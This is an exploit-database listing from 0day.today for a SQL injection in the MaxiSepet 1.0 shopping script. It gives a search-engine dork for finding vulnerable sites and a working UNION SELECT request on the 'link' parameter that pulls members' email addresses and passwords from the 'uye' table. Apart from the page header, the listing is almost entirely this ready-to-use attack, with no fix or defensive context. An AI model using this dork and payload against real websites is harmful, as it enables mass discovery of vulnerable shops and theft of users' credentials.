[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MaxiSepet <= 1.0 (link) SQL Injection Vulnerability

Author
nukedx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-507
Category
web applications
Date add
10-06-2006
Platform
unsorted
===================================================
MaxiSepet <= 1.0 (link) SQL Injection Vulnerability
===================================================



#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.

#Dork: "Copyright MaxiSepet ©"

#How: Parameter link did not sanitized properly.

#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL

#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Ьye%20adi:%20<b>',email,'</b><br>','Юifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC



#  0day.today [2024-12-25]  #